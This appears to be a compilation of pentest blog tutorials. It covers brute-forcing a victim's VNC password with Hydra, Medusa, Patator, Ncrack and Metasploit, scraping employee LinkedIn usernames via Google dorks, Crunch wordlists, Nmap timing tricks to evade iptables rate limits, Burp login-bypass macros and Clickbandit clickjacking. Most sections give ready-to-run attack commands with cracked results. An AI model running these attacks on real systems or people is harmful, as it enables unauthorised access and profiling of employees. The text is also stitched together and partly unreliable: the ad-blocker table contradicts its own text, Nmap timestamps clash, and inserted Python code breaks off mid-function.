In this article, we will learn how to gain control over our victim's PC through port 5900, used by the VNC service. There are various ways to do it, so let's take the time to learn all of them, because different circumstances call for different measures.

Let's start!!

xHydra

This is the graphical version of Hydra, used here to run a dictionary attack against port 5900. For this method to work:

Open xHydra from your Kali Linux terminal. Select the Single Target option and enter the IP of your victim PC. Select VNC in the Protocol box and enter the port number 5900 in the Port box.

Now go to the Passwords tab, select Password List and enter the path of the text file that contains all the passwords in the box next to it.

After doing this, go to the Start tab and click the Start button on the left.

Now the dictionary attack will start, and you will obtain the password of your victim.

Hydra

Hydra is often the tool of choice. It can perform rapid dictionary attacks against more than 50 protocols, including telnet, vnc, http, https, smb, several databases, and much more.

Now, we need to choose a wordlist. As with any dictionary attack, the wordlist is key. Kali has numerous wordlists built right in.

Run the following command

hydra -s 5900 -P /root/Desktop/pass.txt -t 16 192.168.0.6 vnc

-P: denotes the path of the password list

-s: denotes the destination port number

-t: run TASKS number of connects in parallel

Once the command is executed it starts the dictionary attack, and you will have the right password in no time. As you can observe, we have successfully grabbed the VNC password 098765.

Metasploit

This module will test a VNC server on a range of machines and report successful logins. Currently it supports RFB protocol version 3.3, 3.7, 3.8 and 4.001 using the VNC challenge response authentication method.

use auxiliary/scanner/vnc/vnc_login

msf auxiliary(scanner/vnc/vnc_login) > set rhosts 192.168.0.6

msf auxiliary(scanner/vnc/vnc_login) > set pass_file /root/Desktop/pass.txt

msf auxiliary(scanner/vnc/vnc_login) > run

Awesome!! From the image below you can observe that the same password, 098765, has been found by Metasploit.

Patator

Patator is a multi-purpose brute-forcer with a modular design and flexible usage. It is useful for brute-force attacks against several services such as VNC, HTTP and SMB.

patator vnc_login host=192.168.0.6 password=FILE0 0=/root/Desktop/pass.txt -t 1 -x retry:fgrep!='Authentication failure' --max-retries 0 -x quit:code=0

From the image below you can observe that the dictionary attack starts, and thus you obtain the password of your victim.

Medusa

Medusa is intended to be a speedy, massively parallel, modular, login brute-forcer. It supports many protocols: AFP, CVS, HTTP, IMAP, rlogin, SSH, Subversion, and VNC, to name a few.

Run the following command

medusa -h 192.168.0.6 -u root -P /root/Desktop/pass.txt -M vnc

Here

-u: denotes the username

-P: denotes the path of the password list

As you can observe, we have successfully grabbed the VNC password 098765.

Ncrack

Ncrack is a high-speed network authentication cracking tool. It was built to help companies secure their networks by proactively testing all their hosts and networking devices for poor passwords. 

Run the following command

ncrack -v -U /root/Desktop/user.txt -P /root/Desktop/pass.txt 192.168.0.6:5900

Here

-U: denotes the path of the username list

-P: denotes the path of the password list

As you can observe, we have successfully grabbed the VNC password 098765.

Author: Sanjeet Kumar is an Information Security Analyst | Pentester | Researcher. Contact Here


Extract LinkedIn Usernames from Google using Burpsuite pro


Hello friends!! Today you will learn how to extract usernames from a social site such as Facebook or LinkedIn using Burp Suite Pro. Burp Suite Pro provides Python Scripter as an advanced option, which can be helpful for gathering usernames during the reconnaissance phase of a penetration test.

Python Scripter: This extension allows execution of a custom Python script on each HTTP request and response processed by Burp.

To use, type or paste a Python script into the “Script” tab, and use Burp in the normal way. The script will be executed for each HTTP request and response.

 Let’s Start!!

First, to install the Python Scripter extension from the BApp Store in the Extender tab, we need the Jython standalone 2.7.0 JAR file. Open the Extender tab, click the Options tab and browse to the location of the Jython standalone JAR as shown in the image.

Now we can simply install the Python Scripter extension from the BApp Store.

Now click on this link (https://raw.githubusercontent.com/clr2of8/Gather-Usernames-From-Google-LinkedIn-Results/master/scrape-google-linkedin.txt) and copy the complete code.

Now paste the copied code into the Script tab created by installing the Python Scripter extension. If you analyse this Python script you will see that it has been designed for LinkedIn, which is why we look for LinkedIn usernames. If you want to gather usernames from Facebook or any other website, replace the word 'LinkedIn' accordingly.

Now go to the Extensions tab within the Extender tab, click the Output tab and select the Save to File option to save the usernames to a text file; here we have given the path of an empty .txt file where all the usernames will be saved.

Now run a Google search with the Google dork site:linkedin.com/in "certification name" "Company Name" as shown in the image.

Using the above Google dork we extract the LinkedIn usernames of CEH-certified employees of Ignite Technologies.

As you can see, we intercepted the Google search request in the usual way using Burp Suite; now turn intercept off and the script saves the usernames to the .txt file.

In the end we can see that all the usernames related to the company are saved. As Google limits results to 10 per page, we can also save the usernames from the following pages. This technique is very useful when we want to gather a large list of names quickly and easily.

Reference: Link1 & Link2

Author: Ashray Gupta is a Researcher and Technical Writer at Hacking Articles. He is a certified ethical hacker, web penetration tester and a researcher in nanotechnology. Contact Here


Comprehensive Guide to Crunch Tool


Hello friends!! Today we will demonstrate how a pentester can generate his own wordlist of usernames or passwords using the powerful tool Crunch. In Kali Linux you can find crunch under Application > Password Attacks > Crunch.

Crunch generates a wordlist according to the conditions you specify, and its output file can be used by any other program.

We are using crunch version 3.6 for this tutorial and used the parameters given below to generate wordlists.

Syntax: crunch <min-len> <max-len> [charset string] [options]

min-len: the minimum string length at which crunch starts generating the wordlist.

max-len: the maximum string length at which crunch stops.

charset string: the characters crunch uses to build the wordlist; if you do not specify a string, crunch uses its default character set (lowercase letters).

options: crunch offers a list of options that extend what it can generate as per your requirement.

Generating wordlist without using character string

Run the command below, which generates a dictionary of words between 2 and 3 characters long using the default character set. It starts from aa and ends with zzz.

crunch 2 3 -o /root/Desktop/0.txt

Here we used the following parameters to generate the dictionary:

min-len: 2 for two-character words

max-len: 3 for three-character words

-o: the path of the text file in which to save the output.

From the image below you can observe that it generated 18252 lines and saved them in 0.txt.

Now we use the cat command to read the cont�nts of 0.txt, where we can see that it starts from aa and ends with zzz, as shown in the image below.

cat /root/Desktop/0.txt

Generating wordlist using character string

Now run the command below, which generates a dictionary of words between 3 and 4 characters long using "raj" as the character string. It starts from rrr and ends with jjjj.

crunch 3 4 raj -o /root/Desktop/1.txt

From the image below you can observe that it generated 108 lines and saved them in 1.txt.

Now we use the cat command to read the contents of 1.txt, where we can see that it starts from rrr and ends with jjjj.

cat /root/Desktop/1.txt

Similarly, we can use a string of digits to make a dictionary of numeric words.

For example, some users set their date of birth as their password. If we want a dictionary of four-digit combinations representing a day and month, for instance 25th May as 2505, we can use "2505" as the character string to generate a numeric wordlist.

Generating alpha-numeric wordlist

You can generate your own alphanumeric wordlist: run the command below, which generates a dictionary of words between 2 and 3 characters long using "raj123" as the character string.

You can set the minimum and maximum length of your wordlist as per your requirement.

crunch 2 3 raj123 -o /root/Desktop/3.txt

Again we use the cat command to read the contents of 3.txt, where we can see the combinations of alphanumeric characters.

cat /root/Desktop/3.txt

Generating wordlist along with space character

The following command generates a wordlist using a space character together with the string "raj"; the space must be escaped with a backslash (raj\ ) so the shell passes it as part of the string. Instead of the backslash you can also put the string in double quotes with the space inside, as "raj ".

crunch 1 3 "raj " -o /root/Desktop/4.txt

Create wordlist using character set file of RainbowCrack

As we know, RainbowCrack ships a character-set file that is used when cracking hashes with rainbow tables; here we use the same file to generate a more complex wordlist as the situation demands.

cat /usr/share/rainbowcrack/charset.txt

We used the cat command to print the character sets stored in RainbowCrack's charset.txt. From the image below you can observe that it shows the following character sets:

  • numeric
  • alpha
  • alpha-numeric
  • loweralpha
  • loweralpha-numeric
  • mixalpha
  • mixalpha-numeric
  • ascii-32-95
  • ascii-32-65-123-4
  • alpha-numeric-symbol32-space

Now you can choose any of these character sets for generating a wordlist. Suppose I want a wordlist of words up to 5 characters long made of lowercase letters and digits; for that I run the following command.

crunch 4 5 -f /usr/share/rainbowcrack/charset.txt loweralpha-numeric -o /root/Desktop/5.txt

Here -f selects a named character set from a charset file (crunch's own charset.lst or, as here, RainbowCrack's charset.txt).

Again we use the cat command to read the contents of 5.txt, where we can see the combinations of alphanumeric characters.

cat /root/Desktop/5.txt

Generate wordlist with specific Pattern

Crunch provides the -t option to generate a wordlist from a specific pattern as per your requirement.

With option -t you can use 4 types of placeholder, as specified below:

  • Use @ for lowercase letters
  • Use , for uppercase letters
  • Use % for numeric characters
  • Use ^ for special characters (symbols)

To generate a wordlist that has 3 numeric characters to the right of the string "raj", for instance raj123, we run the following command.

Since we have 3 letters from the string raj and we want 3 more numeric characters after it, the minimum and maximum length must both equal the length of the string plus the pattern characters, i.e. 6.

crunch 6 6 -t raj%%% -o /root/Desktop/6.txt

Here -t with the %%% pattern appends 3 numeric characters.

Again we use the cat command to read the contents of 6.txt, where we can see the combinations of alphanumeric characters.

cat /root/Desktop/6.txt

Generate wordlist with Duplicate character limit

Crunch lets you bound the repetition of characters with the -d parameter together with the given pattern.

As we saw above, the pattern raj%%% starts at raj000, which means a digit may be repeated consecutively twice or three times, so the wordlist contains words such as raj000, raj001, raj111, raj110 and so on.

If you do not want a wordlist with repeated digits you can use the -d option to filter repetition.

For example, I want to generate a wordlist using the above pattern raj%%% with each digit repeated consecutively at most twice. To build such a dictionary we execute the command below.

crunch 6 6 -t raj%%% -d 2% -o /root/Desktop/6.1.txt

Here we used the following parameters:

-t takes the pattern, in which each % stands for one of the 3 numeric characters

-d 2% limits the consecutive repetition of each numeric character to at most twice.

Again we used the cat command to read the contents of 6.1.txt, where we can see that it contains combinations of alphanumeric characters with each digit repeated at most two times in a row.

cat /root/Desktop/6.1.txt

Now if you compare the output files 6.txt and 6.1.txt you can notice the difference in digit repetition.

Generate wordlist with Pattern for uppercase letter

To generate a wordlist that contains 3 uppercase characters to the right of the string "raj", for instance rajABC, we execute the following command.

Since the string raj has 3 letters and we are adding 3 uppercase letters after it, the minimum length must be the sum of the string length and the number of pattern characters.

crunch 6 6 -t raj,,, -o /root/Desktop/7.txt

Here -t takes the pattern, in which each comma (,) stands for one of the 3 uppercase letters.

Again we used the cat command to read the contents of 7.txt, where we can see that it contains combinations of mixed-case alphabetic characters.

cat /root/Desktop/7.txt

Similarly we can set a limit on uppercase letter repetition as done above. So if I want that no letter appears twice in a row, we can execute the command below to generate such a dictionary.

crunch 6 6 -t raj,,, -d 1, -o /root/Desktop/7.1.txt

-t takes the pattern, in which each comma (,) stands for one of the 3 uppercase characters

-d 1, limits the consecutive repetition of each uppercase character to at most once, i.e. no two identical letters in a row.

Again we used the cat command to read the contents of 7.1.txt, where we can see that it contains combinations of mixed-case alphabetic characters with no letter repeated consecutively.

cat /root/Desktop/7.1.txt

Now if you compare the output files 7.txt and 7.1.txt you can notice the difference in letter repetition.
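To make the -t placeholder and -d duplicate-limit semantics described in the last two sections concrete, here is an added Python model of them (example code written for this article, not crunch's own source): it expands a pattern the way crunch does, applies a per-class limit on consecutive identical characters, and can cap the number of words like -c. The character set used for ^ is an assumption of the example.

```python
import itertools
from typing import Dict, Iterator, Optional

# Character classes behind the -t placeholders listed above. The set used for ^
# is an assumption of this example; crunch's own special-character list differs.
PLACEHOLDERS: Dict[str, str] = {
    "@": "abcdefghijklmnopqrstuvwxyz",
    ",": "ABCDEFGHIJKLMNOPQRSTUVWXYZ",
    "%": "0123456789",
    "^": "!@#$%^&*()-_+=",
}


def run_ok(word: str, charset: str, limit: int) -> bool:
    """True if no run of identical characters taken from charset is longer than limit."""
    run, prev = 0, None
    for ch in word:
        run = run + 1 if ch == prev else 1
        prev = ch
        if ch in charset and run > limit:
            return False
    return True


def crunch_pattern(pattern: str, dup_limits: Optional[Dict[str, int]] = None,
                   count: Optional[int] = None) -> Iterator[str]:
    """Yield the words crunch -t would produce for `pattern`.

    Every @ , % ^ position is filled from its class, rightmost position
    changing fastest (raj000, raj001, ...); any other character is literal.
    dup_limits maps a placeholder to the longest run of one identical
    character allowed for that class, so -d 2% becomes {"%": 2} and
    -d 1, becomes {",": 1}.  count stops after that many words, like -c.
    """
    dup_limits = dup_limits or {}
    slots = [PLACEHOLDERS.get(ch, ch) for ch in pattern]   # literal chars stay literal
    emitted = 0
    for combo in itertools.product(*slots):
        word = "".join(combo)
        if all(run_ok(word, PLACEHOLDERS[sym], limit) for sym, limit in dup_limits.items()):
            yield word
            emitted += 1
            if count is not None and emitted >= count:
                return


if __name__ == "__main__":
    for pattern, limits in [("raj%%%", None), ("raj%%%", {"%": 2}), ("raj,,,", {",": 1})]:
        words = list(crunch_pattern(pattern, limits))
        print(f"{pattern} with -d {limits}: {len(words)} words, e.g. {words[:4]}")
```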

Use Permutation for generating wordlist

The -p option generates a wordlist by permutation; the minimum and maximum length arguments must still be given but are ignored. It can be used with a single word or with several words, as shown below.

crunch 3 6 -p raj chandel hackingarticles

From the image below you can analyse the output and see the maximum number of permutations generated.

Generate Dictionary with limited words

If you look at all the output above you will find that crunch, after generating a dictionary, displays the number of lines in it. For instance the text file 0.txt has 18252 lines, and each line contains one word only.

So if you want to limit how many lines are generated, execute the command below.

crunch 5 5 IGNITE -c 25 -o /root/Desktop/8.txt

It generates a dictionary of 25 words only and saves the output in 8.txt.

Again we used the cat command to read the contents of 8.txt, where we can see that it contains only 25 alphabetic words.

cat /root/Desktop/8.txt

Wordlist Fragmentation

Use the -b option for wordlist fragmentation, which splits a single wordlist into multiple wordlists. It is quite a useful option for dividing a wordlist of several GB into MB-sized files.

crunch 5 7 raj@123 -b 3mb -o START

From the image below you can observe that it has divided a 7 MB file into three text files.

Generate compressed Dictionary

Crunch lets you generate a compressed wordlist with the -z option, whose accepted values are gzip, bzip2, lzma and 7z. Execute the command below for compression.

crunch 5 7 raj@123 -z gzip -o START

From the image below you can observe that it has generated a compressed text file.

Author: Aarti Singh is a Researcher and Technical Writer at Hacking Articles, an Information Security Consultant, Social Media Lover and Gadgets. Contact here

The post Comprehensive Guide to Crunch Tool appeared first on Hacking Articles.

Examine Browser Ad-Blockers Strength using Burpsuite


Today we will determine the effectiveness of different ad blockers, namely Ghostery, AdBlock Ultimate and uBlock Origin, which are browser extensions whose job is to block the ads that pop up while you browse websites.

To make use of these extensions you need to install and enable them. We will measure the strength of these ad blockers by counting the number of HTTP GET requests they let a website generate, as explained below.

Let’s start!!

Examine HTTP Request without any Ad-blocker

To analyse this we intercepted the requests of the website CNN.com.

We used Burp Suite in the usual way, without any extension or ad blocker enabled. Then we turned off the Intercept tab after capturing the requests of the website.

Click on the HTTP history tab under the Proxy tab, where we see that the website made 122 HTTP GET requests. These requests were generated without any extension enabled.

Examine Adblock Ultimate Extension

Next we intercepted the requests of the website CNN.com with AdBlock Ultimate installed and enabled in our Firefox. Then we turned off the Intercept tab after capturing the requests of the website.

Click on the HTTP history tab under the Proxy tab, where we see that the website made 116 HTTP GET requests. As you can see, the number of requests has reduced, which shows the strength of the extension.

Examine Ghostery Extension

Similarly, next we intercepted the requests of the website CNN.com with Ghostery installed and enabled in our Firefox.

We used Burp Suite in the usual way but with the Ghostery extension enabled. Then we turned off the Intercept tab after capturing the requests of the website.

Click on the HTTP history tab under the Proxy tab, where we see that the website made 113 HTTP GET requests. As you can see, the number of requests has reduced further, which shows that the Ghostery extension is stronger than the AdBlock Ultimate extension.

Examine UBlock Origin

We intercepted the requests of the website CNN.com with uBlock Origin enabled.

We used Burp Suite in the usual way but with the uBlock Origin extension enabled. Before capturing the requests of the website you need to install the extension and enable it. Then we turned off the Intercept tab after capturing the requests of the website.

Click on the HTTP history tab under the Proxy tab, where we see that the website made 110 HTTP GET requests. As you can see, the number of requests has reduced the most, which shows the strength of the uBlock Origin extension.


Conclusion: from the table below you can decide which ad blocker is stronger.

S.No  Browser Ad-blocker   Captured HTTP Requests
1     Without Ad-blocker   122 HTTP GET
2     AdBlock Ultimate     116 HTTP GET
3     Ghostery             116 HTTP GET
4     uBlock Origin        110 HTTP GET

Author: Ashray Gupta is a Researcher and Technical Writer at Hacking Articles. He is a certified ethical hacker, web penetration tester and a researcher in nanotechnology. Contact Here

The post Examine Browser Ad-Blockers Strength using Burpsuite appeared first on Hacking Articles.

Understanding Guide for Nmap Timing Scan (Firewall Bypass)


In this article we are going to scan the target machine with a normal Nmap scan as well as with each timing template, and confirm the time between packets by analysing the Nmap traffic in Wireshark.

The timing template in Nmap is set with -T<0-5>, with -T0 the slowest and -T5 the fastest. By default all Nmap scans run with the -T3 timing template. Timing templates are used to optimise and improve the quality and performance of a scan to get the desired results.

Let’s start!!

Nmap Insane (-T5) Scan

This template sends packets insanely fast and waits only 0.3 seconds for a response. The time difference between two packets sent is up to 5 milliseconds. This timing template makes the scan superfast, but accuracy is sometimes sacrificed. Nmap gives up on a host if it cannot complete the scan within 15 minutes. Apart from that, -T5 should be used only on fast networks and high-end systems, as sending packets this fast can affect the working of the network or system and can result in system failure.

To use a timing template, pass the -T<0-5> attribute to Nmap while scanning a target network.

nmap -T5 -p21-25 192.168.1.104

Here the packets sent to the target IP are spaced by a maximum of 5 milliseconds, or 0.005 seconds.

Packet 1 has Arrival Time of 04:41:04.557153433

Packet 2 has Arrival Time of 04:41:04.557225304

The difference between the arrival time of Packet 1 and Packet 2 is about 0.07 milliseconds.

Nmap Aggressive (-T4) Scan

This template sends packets very fast and waits only 1.25 seconds for a response. The time difference between two packets sent is up to 10 milliseconds. The official Nmap documentation recommends -T4 for "reasonably modern and reliable networks".

nmap -T4 -p21-25 -d 192.168.1.104

Here the packets sent to the target IP are spaced by a maximum of 5 milliseconds, or 0.005 seconds.

Packet 1 has Arrival Time of 05:58:34.636899267

Packet 2 has Arrival Time of 05:58:34.637122896

The difference between the arrival time of Packet 1 and Packet 2 is about 0.2 milliseconds.

Nmap Normal (-T3) Scan

This is the default Nmap timing template, used when no -T argument is specified.

nmap -T3 -p21-25 -d 192.168.1.104

Packet 1 has Arrival Time of 06:01:12.574866212

Packet 2 has Arrival Time of 06:01:12.575059033

The difference between the arrival time of Packet 1 and Packet 2 is about 0.1 milliseconds.

Nmap Polite (-T2) Scan

This template sends packets more quickly than -T0 and -T1 but still slower than the normal scan. The time difference between two packets sent is 0.4 seconds.

nmap -T2 -p21-25 192.168.1.104

Packet 1 has Arrival Time of 06:07:38.139876513

Packet 2 has Arrival Time of 06:01:12.540686453

Nmap Sneaky (-T1) Scan

This template sends packets slowly, well below the rate of the normal scan. The time difference between two packets sent is 15 seconds.

nmap -T1 -p21-25 192.168.1.104

Packet 1 has Arrival Time of 06:17:02.354879724

Packet 2 has Arrival Time of 06:17:17.371063606

The difference between the arrival time of Packet 1 and Packet 2 is about 15 seconds.

Nmap Paranoid (-T0) Scan

This template sends packets very slowly, scanning only one port at a time. The time difference between two packets sent is 5 minutes.

nmap -T0 -p21-25 192.168.1.104

Packet 1 has Arrival Time of 06:32:25.043303267

Packet 2 has Arrival Time of 06:37:25.080804929

The difference between the arrival time of Packet 1 and Packet 2 is about 5 minutes.

Evading Time Based Firewall rules using timing templates

Block Insane T5 scan

Even though we can speed up the scan with the -T5 and -T4 templates, there is a chance that the target system uses firewall rules to protect itself. Here are some examples of such firewall rules and the methods to get past them.

This rule blocks TCP packets from an IP address once the packet count exceeds 1 within 1 second; in other words, only the first packet from an IP address in any 1-second window gets a response.

sudo iptables -I INPUT -p tcp -m state --state NEW -m recent --set

sudo iptables -I INPUT -p tcp -m state --state NEW -m recent --update --seconds 1 --hitcount 1 -j DROP

If you scan more than 1 port on a target protected by the above rule, the result will not be as desired. With -T5 or -T4 the time difference between packets is far less than 1 second, so if we scan five ports at a time it will show one as open/closed and the others as filtered. However, -T5 also has --max-retries set to 2, meaning it will retry the unanswered ports 2 more times, so 3 of the 5 ports will get an accurate open/closed status and the remaining 2 will be filtered.

nmap -T5 -p21-25 192.168.1.104

From the image below you can observe that it shows 3 ports as open and 2 ports as filtered.

The packet exchange between the scanner and the target, captured in Wireshark, clearly shows that TCP SYN packets were sent multiple times to ports 22 and 23 and no reply was received for those probes.

Bypass Insane T5 Firewall filter

1st method

Use the --max-retries argument to increase the number of retries so that each retry gives the accurate status of one more port. Execute the command below to increase the maximum retries with a T5 scan; here I used 4, which you can modify as per your requirement.

nmap -T5 -p21-25 192.168.1.104 --max-retries 4

Now, from the image below, you can observe that it shows all 5 ports as open.

Here the packet exchange shows that in each retry one more port sends its reply, confirming its status, as shown in the image below.

2nd Method

The second method is to use a timing template with a greater time difference between packets; here we can use any template below T5, i.e. T4 to T0, to get past the above rule.

nmap -T4 -p21-25 192.168.1.104

or

nmap -T3 -p21-25 192.168.1.104

or

nmap -T2 -p21-25 192.168.1.104

or

nmap -T1 -p21-25 192.168.1.104

or

nmap -T0 -p21-25 192.168.1.104

Here the packet exchange shows that every port replied, but the first reply came instantly and the other ports replied one by one after some time.

Block Aggressive T4, Normal T3 & Polite T2 Scan

Now the rules below will block TCP packets from an IP address once the packet count exceeds 1 within 3 seconds; in other words, only the first packet from an IP address in any 3-second window gets a response.

sudo iptables -I INPUT -p tcp -m state --state NEW -m recent --set

sudo iptables -I INPUT -p tcp -m state --state NEW -m recent --update --seconds 3 --hitcount 1 -j DROP

Here we use -T4 to scan 5 ports; the time difference between packets is far less than 1 second, so if we scan five ports at a time it will show one as open/closed and the others as filtered. -T4 also has --max-retries set to 6, meaning it will retry the unanswered ports 6 more times, but as the firewall's time window exceeds the total time taken by all the retries it will show all ports as filtered.

nmap -T4 -p21-25 192.168.1.104

or

nmap -T3 -p21-25 192.168.1.104

or

nmap -T2 -p21-25 192.168.1.104

The result of the T4, T3 and T2 scans can be either all ports filtered or any one port showing an open/closed state. From the image below you can observe that it shows all 5 ports as filtered.

Here we can see that none of the packets got a reply.

Bypass Aggressive T4, Normal T3 & Polite T2 Firewall filter

To get past this kind of rule we have to use a timing template that is slower than -T4.

nmap -T1 -p21-25 192.168.1.104

Here we can see that all the packets got a reply, because the interval between packets in T1 is almost 15 seconds.

Block Sneaky (-T1) Scan

Now this rule blocks TCP packets from an IP address once the packet count exceeds 1 within 200 seconds; in other words, only the first packet from an IP address in any 200-second window gets a response.

sudo iptables -I INPUT -p tcp -m state --state NEW -m recent --set

sudo iptables -I INPUT -p tcp -m state --state NEW -m recent --update --seconds 200 --hitcount 1 -j DROP

Now repeat the T1 scan as given below; this time you will find that the firewall is blocking our Nmap probes, so the open/closed state of the ports cannot be identified.

nmap -T1 -p21-25 192.168.1.104

The result of the T1 scan can be either all ports filtered or any one port showing an open/closed state. From the image below you can observe that it shows 4 ports as filtered.

Here we can see that only one of the packets got a reply; the rest were dropped by the firewall.

Bypass Sneaky (-T1) Scan

To get past this kind of rule we have to use a timing template whose gap between packets is more than 200 seconds, so use the paranoid timing template, as the time difference between two packets is about 5 minutes, as discussed above.

nmap -T0 -p21-25 192.168.1.104

From the image below you can observe that it took 1813.61 seconds, close to 30 minutes, to scan 5 ports, and found all 5 ports open.

Here we can see that we got a response to every packet even though the firewall had its rules in place.

To evade any type of IPS or firewall with the slower timing templates, remember that the scan will take much longer than usual, so specify a small number of ports so that the slow scan does not waste time on ports you did not intend to scan.

Author: Deepanshu is a Certified Ethical Hacker and a budding Security Researcher. Contact here.

The post Understanding Guide for Nmap Timing Scan (Firewall Bypass) appeared first on Hacking Articles.

Advance Web Application Testing using Burpsuite


Hello friends!! Today we are going to discuss the advanced options of Burp Suite Pro for web penetration testing; here we used the Bwapp lab, which you can install from here, and the Acunetix vulnerable web application, which is available online for practising web application penetration testing.

Burp suite Advance Usage

  • Burp Infiltrator
  • Macros
  • Burp Clickbandit

Burp Infiltrator

Burp Infiltrator is a tool used to instrument web applications so that they can be tested with Burp Scanner. Instrumenting the application lets Burp detect cases where its input reaches potentially unsafe APIs on the server side.

Burp Infiltrator supports applications which are written in:

  • Java, Groovy, Scala, or other JVM languages (JRE versions 1.4 – 1.8)
  • C#, VB, or other .NET languages (.NET versions 2.0 and later)

Let’s start!!

First, we need to enable Burp Infiltrator from the Burp menu in Burp Suite, where we select the Burp Infiltrator option. A Burp Infiltrator dialog then appears, where you select the type of application you want to instrument, as shown in the image.

After that we need to select the folder where we want the Infiltrator file to be saved, so that we can run it later from the terminal.

Next we give the path of the folder where the Infiltrator file will be saved, as shown in the image.

The Burp Infiltrator file is then saved as burp_infiltrator_java.jar.

Now, to run the Burp Infiltrator file, we go to its path in the terminal and execute it with the command java -jar burp_infiltrator_java.jar --non-interactive, then press Enter.

We used --non-interactive so that the default settings are applied automatically; otherwise we would have to configure all the settings manually. Now we can intercept the requests of any website or application built on the supported platforms, as shown in the image.

Turn off the Intercept tab. Select the Target tab, where we can see a sub-tab Site map, as shown in the image.

Then select the URL you want to scan using Burp Infiltrator: right-click on the URL and select the option Actively scan this host. This reports all the issues found in the website or application we scan. All issues related to the scanned URL can be seen in the Issues box, as shown in the image.

Macros

Burp Suite has a session handling ability that can run macros according to session handling rules. A macro is a predefined sequence of one or more requests. Typical uses of macros include:

  • Fetching a page such as the user's home page just to check whether the current session is still valid.
  • Performing a login operation to obtain a new valid session.
  • Obtaining a token or nonce to use as a parameter in another request.

Macros are recorded using your browser. When defining a macro, Burp Suite displays the Proxy history, from which you can select the requests to be used for the macro. You can select from previously made requests, or record a fresh macro and select the new items from the history. When you have recorded the macro, the macro editor shows the details of the items in the macro, which you can review and configure as required.

Let’s start!!

First we intercepted the login request of the Bwapp Lab, where we had entered the default username and password as shown in the image.

The request is captured in the Intercept tab. Right-click anywhere on the captured request, then select the option Do intercept, which has a sub-option Response to this request; click on it.

Then we forwarded the captured request until we were successfully logged into the Bwapp Lab.

After that, go to the Project options tab, where we need to select the Sessions tab as shown in the image.

Click the Add button under Session Handling Rules, which opens a Session handling rule editor window, where we gave the rule a name under Rule description as shown in the image.

Click the Add button under Rule Actions and select the Check session is valid option, which opens the Session handling action editor. Enter the expression you want Burp Suite to look for in the URL (we gave login.php) and tick the option If session is invalid, perform the action below, as shown in the image.

Click the Add button under Select Macro, which opens the Macro Recorder window, where we select the item from the proxy history that we want to include in the macro, as shown in the image. Click OK.

Next the Macro Editor window opens, where we give the macro a name in the Macro description field as shown in the image. Click OK.

After this we get back to the Session handling rule editor, where we click on the Scope tab; tick the options Extender and Proxy under Tools Scope and Include all URLs under URL Scope, then click OK. The macro is now running in the background.

As you can see in the image, we are on the login page of the Bwapp Lab and have not entered any login details.

We made a simple change in the URL: we replaced login.php with portal.php, as shown in the image.

This successfully logged us into the Bwapp Lab without entering any login details.

Burp Clickbandit

Burp Clickbandit is a tool in Burp Suite for generating clickjacking attacks. When you know a web page is vulnerable to clickjacking, you can use Burp Clickbandit to create an attack and confirm that the vulnerability can be successfully exploited. When running Burp Clickbandit on untrusted websites, note that malicious JavaScript from the target site can take control of the HTML output generated by Burp Clickbandit. Burp Clickbandit has two modes:

Record Mode

Burp Clickbandit first opens in record mode. Perform one or more mouse clicks to record your clickjacking attack; these are the clicks the victim user will need to make to trigger the desired action. You can also use the "disable click actions" checkbox to record clicks without the target page handling them. When you have finished recording, click the "Finish" button to enter review mode.

Review Mode

When you have finished recording your clickjacking attack, Burp Clickbandit enters into review mode. This lets you review the generated attack, with the attack user interface over the original page UI. You can click the buttons on the attack UI to verify that the attack works.

List of commands that are available in review mode:

  • + And – buttons are used to zoom in and out.
  • The “toggle transparency” button allows you to show or hide the original page UI.
  • The “reset” button restores the generated attack, as it was before any further clicks were made.
  • The "save" button saves an HTML file containing the attack. This can be used as a real-world exploit of the clickjacking vulnerability.
  • You can use the keyboard arrow keys to reposition the attack UI over the original page UI, if not correctly aligned with the original page UI.

Let’s start!!

Burp Clickbandit runs in the browser using JavaScript. It works on all current browsers except Microsoft IE and Edge.

To run Clickbandit, go to the Burp menu and select "Burp Clickbandit".

Click the "Copy Clickbandit to clipboard" button. This copies the Clickbandit script to your clipboard.

In your browser, visit the web page that you want to test in the usual way. Then open the web developer console (also called "developer tools" or "JavaScript console"). Paste the Clickbandit script into the web developer console (typing allow pasting first if the console requires it before accepting pasted code) and press Enter.

The Burp Clickbandit logo appears at the top of the browser window and the original page is loaded within a frame, ready for the attack to be performed; this is the record mode of Burp Clickbandit. Perform one or more mouse clicks to record your clickjacking attack; these are the clicks the victim user will need to make to trigger the desired action. You can also use the "disable click actions" checkbox to record clicks without the target page handling them. When you have finished recording, click the "Finish" button to enter review mode.

When you have finished recording your clickjacking attack, Burp Clickbandit enters review mode. This lets you review the generated attack, with the attack user interface overlaid on the original page UI.

Clicking the Save button saves an HTML file containing the attack. This can be used as a real-world exploit of the clickjacking vulnerability.

We opened the saved HTML file, which shows the transparent UI we created over the original UI, with a click button in the red box appearing on the page.

We can click the buttons on the attack UI to verify that the attack works. The message "You've been Clickjacked" appears, as shown in the image.
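Clickbandit can only frame a page that the server lets other origins frame, so the check a defender runs on the same target is the framing policy in the response headers. The following is an added Python evaluator (example code written for this article, not part of Burp) that decides whether a page with the given headers can be framed from a given origin; all header values and origins below are constructed samples.

```python
from urllib.parse import urlsplit
from typing import Dict, Tuple


def _origin(url: str) -> Tuple[str, str]:
    """Return (scheme, host) for an origin such as https://shop.example."""
    parts = urlsplit(url if "://" in url else "https://" + url)
    return parts.scheme.lower(), (parts.hostname or "").lower()


def _source_matches(source: str, page_origin: str, framer_origin: str) -> bool:
    """Match one CSP frame-ancestors source expression against the framing origin."""
    source = source.lower().strip("'")          # 'self' / 'none' keywords lose their quotes
    f_scheme, f_host = _origin(framer_origin)
    if source == "none":
        return False
    if source == "self":
        return _origin(page_origin) == (f_scheme, f_host)
    if source == "*":
        return True
    if source.endswith(":"):                    # scheme-only source, e.g. https:
        return f_scheme == source[:-1]
    scheme, _, host = source.rpartition("://")  # scheme part may be empty
    host = host.split(":")[0].split("/")[0]     # drop any port and path
    if scheme and scheme != f_scheme:
        return False
    if host.startswith("*."):                   # wildcard matches subdomains only
        return f_host.endswith(host[1:])
    return f_host == host


def framable_by(headers: Dict[str, str], page_origin: str,
                framer_origin: str) -> Tuple[bool, str]:
    """Decide whether a page served with `headers` can be framed by `framer_origin`.

    Returns (framable, reason).  A CSP frame-ancestors directive wins over
    X-Frame-Options when both are present, as in current browsers.  The
    obsolete X-Frame-Options ALLOW-FROM form is ignored by current browsers,
    so it is treated here as offering no protection.
    """
    h = {k.lower(): v for k, v in headers.items()}
    for directive in h.get("content-security-policy", "").split(";"):
        name, _, value = directive.strip().partition(" ")
        if name.lower() == "frame-ancestors":
            sources = value.split()
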